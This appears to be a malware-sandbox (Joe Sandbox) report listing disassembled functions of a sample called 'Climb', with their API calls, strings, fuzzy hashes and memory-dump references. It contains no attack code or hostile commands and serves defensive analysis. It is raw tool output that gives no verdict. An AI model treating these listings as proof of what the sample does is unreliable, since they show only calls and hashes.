Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: be0a28745b5d75ebf8d962ebb67216d71ba2c55208d639f4ab3bae559e66ce33
Instruction ID: 4aafae76361a17514e25fdb02d1b3b93d120ee9d2e73436f3c44f7cd96646aaa
Opcode Fuzzy Hash: be0a28745b5d75ebf8d962ebb67216d71ba2c55208d639f4ab3bae559e66ce33
Instruction Fuzzy Hash: 5B41FA786067C96DFF39976084143F5BEB06F12304F88806DD6C64A5C2EBA59EC8C793

Function 00139730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00139750

Part of subcall function 00119805: _wcslen.LIBCMT ref: 00119828

_wcslen.LIBCMT ref: 001397AB
_wcslen.LIBCMT ref: 001397F9
_wcslen.LIBCMT ref: 00139839
_wcslen.LIBCMT ref: 001398CB

Strings

stdcall, xrefs: 00139833, 00139838
cdecl, xrefs: 001397A5, 001397AA
none, xrefs: 001398C2, 001398C7
winapi, xrefs: 001397F3, 001397F8

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 546c00906134f496f01c23b7afb3255131d3c178e150e56d32f876b89ce4344c
Instruction ID: bfd656bcb212e8bf2e1b298e844086b5cf92ac93a7c5bddd607830d3d4e6da12
Opcode Fuzzy Hash: 546c00906134f496f01c23b7afb3255131d3c178e150e56d32f876b89ce4344c
Instruction Fuzzy Hash: 1D51D132A0011AABCB14DF68C9509FEB7A5BF65364F204269F866E7381EB71DE40C790

Function 00134189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 001341D1
CoUninitialize.OLE32 ref: 001341DC
CoCreateInstance.OLE32(?,00000000,00000017,00150B44,?), ref: 00134236
IIDFromString.OLE32(?,?), ref: 001342A9
VariantInit.OLEAUT32(?), ref: 00134341
VariantClear.OLEAUT32(?), ref: 00134393

Strings

NULL Pointer assignment, xrefs: 0013427B
Failed to create object, xrefs: 00134241, 001342F7
Invalid parameter, xrefs: 001342C2

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: d93f46928c568af7949893e808362a4e08c3e009eb26c3e7307cd526167e88fd
Instruction ID: 87a514b0fb86004e12179c0f5f3c73cd36b8c035e4364e32dfe30b045ffbe005
Opcode Fuzzy Hash: d93f46928c568af7949893e808362a4e08c3e009eb26c3e7307cd526167e88fd
Instruction Fuzzy Hash: 4D618D716087119FD710DF64D889BABBBE8EF49714F004919F985AB2A1C770FD84CB92

Function 00128BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00128C9C
SystemTimeToFileTime.KERNEL32(?,?), ref: 00128CAC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00128CB8
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00128D55
SetCurrentDirectoryW.KERNEL32(?), ref: 00128D69
SetCurrentDirectoryW.KERNEL32(?), ref: 00128D9B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00128DD1
SetCurrentDirectoryW.KERNEL32(?), ref: 00128DDA

Strings

*.*, xrefs: 00128DE0

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 9c639991b0f34bd6964fc64e4cf55d8a1e8457728f2edc2a50ff2aedb1d64960
Instruction ID: d3bf1cfb832f79983ee3b1aebc752097d28cf49ece36c2c71e3243512455a3e9
Opcode Fuzzy Hash: 9c639991b0f34bd6964fc64e4cf55d8a1e8457728f2edc2a50ff2aedb1d64960
Instruction Fuzzy Hash: 41616A725043159FDB10EF60D8449EEB3E8FF99310F04482EF99997252EB31E955CBA2

Function 001446E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00144715
SetMenu.USER32(?,00000000), ref: 00144724
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001447AC
IsMenu.USER32(?), ref: 001447C0
CreatePopupMenu.USER32 ref: 001447CA
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001447F7
DrawMenuBar.USER32 ref: 001447FF

Strings

F, xrefs: 001447EA
0, xrefs: 001446F0

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: ab672e3c329f4ab0daaffccffa8a0351221770de4683bded04eb859c611ff9a8
Instruction ID: 3af5269169ec4b4b6f012416a74e38e345c0f172e3dc3849f115f9c53df05990
Opcode Fuzzy Hash: ab672e3c329f4ab0daaffccffa8a0351221770de4683bded04eb859c611ff9a8
Instruction Fuzzy Hash: 554169B9A0120AAFDF14CFA4E884FAA7BB5FF4A314F144028FA4597361C770A910CF50

Function 0011282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333

Part of subcall function 001145FD: GetClassNameW.USER32(?,?,000000FF), ref: 00114620

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 001128B1
GetDlgCtrlID.USER32 ref: 001128BC
GetParent.USER32 ref: 001128D8
SendMessageW.USER32(00000000,?,00000111,?), ref: 001128DB
GetDlgCtrlID.USER32(?), ref: 001128E4
GetParent.USER32(?), ref: 001128F8
SendMessageW.USER32(00000000,?,00000111,?), ref: 001128FB

Strings

ListBox, xrefs: 0011286E
ComboBox, xrefs: 00112839

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: e60fd8b32847794a42a32d8f3c5205c9889b12fcea5530644948dda756599e55
Instruction ID: 5f0db6a18ddd61535ababf7614b7d9f9297296dabd4fd7578e7bb719c324ace5
Opcode Fuzzy Hash: e60fd8b32847794a42a32d8f3c5205c9889b12fcea5530644948dda756599e55
Instruction Fuzzy Hash: FD21F974E00118BFCF08AFA4DC85DEEBBB8EF06350F004126F961932A1DB794859DB60

Function 0011290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333

Part of subcall function 001145FD: GetClassNameW.USER32(?,?,000000FF), ref: 00114620

SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00112990
GetDlgCtrlID.USER32 ref: 0011299B
GetParent.USER32 ref: 001129B7
SendMessageW.USER32(00000000,?,00000111,?), ref: 001129BA
GetDlgCtrlID.USER32(?), ref: 001129C3
GetParent.USER32(?), ref: 001129D7
SendMessageW.USER32(00000000,?,00000111,?), ref: 001129DA

Strings

ListBox, xrefs: 0011294F
ComboBox, xrefs: 0011291A

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 10a660241c02fc8cfdc9fda1564af69c5c0dd88001c8192527c3e6f4c4d8cfa7
Instruction ID: cbabe8ceeb23bc1e8fca281e5e5f04da2b02a54bd5d0bac366726ff29d470c63
Opcode Fuzzy Hash: 10a660241c02fc8cfdc9fda1564af69c5c0dd88001c8192527c3e6f4c4d8cfa7
Instruction Fuzzy Hash: 6021D875E00128BBCF05AFA4DC45EFEBBB8EF05344F004066F951971A1D7794999DB60

Function 001444BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00144539
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 0014453C
GetWindowLongW.USER32(?,000000F0), ref: 00144563
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00144586
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 001445FE
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00144648
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00144663
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 0014467E
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00144692
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 001446AF

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 4d2f3dddc30fd2adc5d82011d23f3a3bf20795058391f2042c0ceeea79dda8a2
Instruction ID: eda79d2d11dc481d071d92c4751c40e52615f27e2e2094dda296d524b6497616
Opcode Fuzzy Hash: 4d2f3dddc30fd2adc5d82011d23f3a3bf20795058391f2042c0ceeea79dda8a2
Instruction Fuzzy Hash: 45618A75A00258AFDB11DFA8CC81FEE77B8EF0A704F10015AFA04E72A1C774AA46DB50

Function 0011BAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0011BB18
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0011ABA8,?,00000001), ref: 0011BB2C
GetWindowThreadProcessId.USER32(00000000), ref: 0011BB33
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0011ABA8,?,00000001), ref: 0011BB42
GetWindowThreadProcessId.USER32(?,00000000), ref: 0011BB54
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0011ABA8,?,00000001), ref: 0011BB6D
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0011ABA8,?,00000001), ref: 0011BB7F
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0011ABA8,?,00000001), ref: 0011BBC4
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0011ABA8,?,00000001), ref: 0011BBD9
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0011ABA8,?,00000001), ref: 0011BBE4

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 92dc3e8b062de3fc4f4897ea03fe0b86f6c6cbc6e8fabf506afabfc7cd567363
Instruction ID: 1035bb0c8a875f4380f4206a44c929b7a95c8e55f4bb6d0d750a7e407f86799a
Opcode Fuzzy Hash: 92dc3e8b062de3fc4f4897ea03fe0b86f6c6cbc6e8fabf506afabfc7cd567363
Instruction Fuzzy Hash: C331C17590C215AFDB159B14ECC4FEA37A9EB05312F114025FA05C79A0DB7499C0CB28

Function 000E2FF3 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 000E3007

Part of subcall function 000E2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,000EDB51,00181DC4,00000000,00181DC4,00000000,?,000EDB78,00181DC4,00000007,00181DC4,?,000EDF75,00181DC4), ref: 000E2D4E
Part of subcall function 000E2D38: GetLastError.KERNEL32(00181DC4,?,000EDB51,00181DC4,00000000,00181DC4,00000000,?,000EDB78,00181DC4,00000007,00181DC4,?,000EDF75,00181DC4,00181DC4), ref: 000E2D60

_free.LIBCMT ref: 000E3013
_free.LIBCMT ref: 000E301E
_free.LIBCMT ref: 000E3029
_free.LIBCMT ref: 000E3034
_free.LIBCMT ref: 000E303F
_free.LIBCMT ref: 000E304A
_free.LIBCMT ref: 000E3055
_free.LIBCMT ref: 000E3060
_free.LIBCMT ref: 000E306E

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9cdeb06b95486c0158290319639278db72b401703f9d516a1b2d01cb3b7c2ffa
Instruction ID: 9429e745bfe90b979a0113ce4c093d5a74fb0079800b1b5b9fce8bca0766c644
Opcode Fuzzy Hash: 9cdeb06b95486c0158290319639278db72b401703f9d516a1b2d01cb3b7c2ffa
Instruction Fuzzy Hash: EE11B67610414CBFCB01EF96CC42CDD3BA9EF05350B8144A5FA08AF223DA31EE619B91

Function 000B2AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 000B2AF9
OleUninitialize.OLE32(?,00000000), ref: 000B2B98
UnregisterHotKey.USER32(?), ref: 000B2D7D
DestroyWindow.USER32(?), ref: 000F3A1B
FreeLibrary.KERNEL32(?), ref: 000F3A80
VirtualFree.KERNEL32(?,00000000,00008000), ref: 000F3AAD

Strings

close all, xrefs: 000B2AF4

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: b0c1338f367768e5fce4c06e6eaa7f456d0c4867178dc618fdf09f98d8645cfb
Instruction ID: 85f9e992924daab61264f88331c0ccb2d9e71d36d02b2ebef440491b1f04ae61
Opcode Fuzzy Hash: b0c1338f367768e5fce4c06e6eaa7f456d0c4867178dc618fdf09f98d8645cfb
Instruction Fuzzy Hash: CED18F31701212DFCB29EF15D859BA9F7A0BF04710F1142ADEA4AAB662CB31ED52DF40

Function 00128835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001289F2
SetCurrentDirectoryW.KERNEL32(?), ref: 00128A06
GetFileAttributesW.KERNEL32(?), ref: 00128A30
SetFileAttributesW.KERNEL32(?,00000000), ref: 00128A4A
SetCurrentDirectoryW.KERNEL32(?), ref: 00128A5C
SetCurrentDirectoryW.KERNEL32(?), ref: 00128AA5
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00128AF5

Strings

*.*, xrefs: 00128AAB

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 1b77d592479999c4fc517359eeae9636c8b3480871b3636320681b3f19f4dbca
Instruction ID: 2c3582ed25e7ddf06a79e85c385aae093da1bd57cf8e9ca52a2fdae8ec2830e6
Opcode Fuzzy Hash: 1b77d592479999c4fc517359eeae9636c8b3480871b3636320681b3f19f4dbca
Instruction Fuzzy Hash: B481BF729053249FCB24EF14D444ABAB3E8BF94314F58482EF885D7251EF34E995CB92

Function 000B7447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 000B74D7

Part of subcall function 000B7567: GetClientRect.USER32(?,?), ref: 000B758D
Part of subcall function 000B7567: GetWindowRect.USER32(?,?), ref: 000B75CE
Part of subcall function 000B7567: ScreenToClient.USER32(?,?), ref: 000B75F6

GetDC.USER32 ref: 000F6083
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 000F6096
SelectObject.GDI32(00000000,00000000), ref: 000F60A4
SelectObject.GDI32(00000000,00000000), ref: 000F60B9
ReleaseDC.USER32(?,00000000), ref: 000F60C1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 000F6152

Strings

U, xrefs: 000F6021

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: b6beea3f0d57678946cd2f028d48ffc807ebaf5e759d5e955df6fa23ba8ad084
Instruction ID: b53cbfa6a8252d4aa78aa036888b16b4dc55beb5e8c92e915c829a3533f4fc17
Opcode Fuzzy Hash: b6beea3f0d57678946cd2f028d48ffc807ebaf5e759d5e955df6fa23ba8ad084
Instruction Fuzzy Hash: BD71B134500209EFCF75CF64CC84AFA7BB5FF49315F284669EE555A566CB328880EB50

Function 0014955E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000B249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000B24B0

Part of subcall function 000B19CD: GetCursorPos.USER32(?), ref: 000B19E1
Part of subcall function 000B19CD: ScreenToClient.USER32(00000000,?), ref: 000B19FE
Part of subcall function 000B19CD: GetAsyncKeyState.USER32(00000001), ref: 000B1A23
Part of subcall function 000B19CD: GetAsyncKeyState.USER32(00000002), ref: 000B1A3D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 001495C7
ImageList_EndDrag.COMCTL32 ref: 001495CD
ReleaseCapture.USER32 ref: 001495D3
SetWindowTextW.USER32(?,00000000), ref: 0014966E
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00149681
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 0014975B

Strings

@GUI_DROPID, xrefs: 001496AD
@GUI_DRAGFILE, xrefs: 001496F6

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 32eafa55152e4c6d29957b24b69475707e721aab35524bef481f1d32f8d8f90f
Instruction ID: de0fc7f6cd60748aa809ff1513e69cfb1c300805054678c8f604da2f1a178265
Opcode Fuzzy Hash: 32eafa55152e4c6d29957b24b69475707e721aab35524bef481f1d32f8d8f90f
Instruction Fuzzy Hash: 4F518C74604304AFDB04EF24DC96FAA77E4FB88714F400A2DF996972E2DB709A44CB52

Function 0012CC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0012CCB7
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0012CCDF
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0012CD0F
GetLastError.KERNEL32 ref: 0012CD67
SetEvent.KERNEL32(?), ref: 0012CD7B
InternetCloseHandle.WININET(00000000), ref: 0012CD86

Strings

, xrefs: 0012CD00

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 00bc72b622df8cd90bcf9227809838716609fdd3d75640f67f73d0ead2f2eb6b
Instruction ID: fbb010da7d8b868948926d3c28794e4063de3358edd9de86a9e7cf82f637cfc8
Opcode Fuzzy Hash: 00bc72b622df8cd90bcf9227809838716609fdd3d75640f67f73d0ead2f2eb6b
Instruction Fuzzy Hash: D631ABB5600618AFDB21AFA4FC88AAF7BFCEB45744B10452AF54693210DB30E9549BE0

Function 0011A215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,000F55AE,?,?,Bad directive syntax error,0014DCD0,00000000,00000010,?,?), ref: 0011A236
LoadStringW.USER32(00000000,?,000F55AE,?), ref: 0011A23D

Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0011A301

Strings

Error: , xrefs: 0011A2CF
Line %d:, xrefs: 0011A28C
Line %d (File "%s"):, xrefs: 0011A2A7
%s (%d) : ==> %s.: %s %s, xrefs: 0011A26B
., xrefs: 0011A2E7

Memory Dump Source

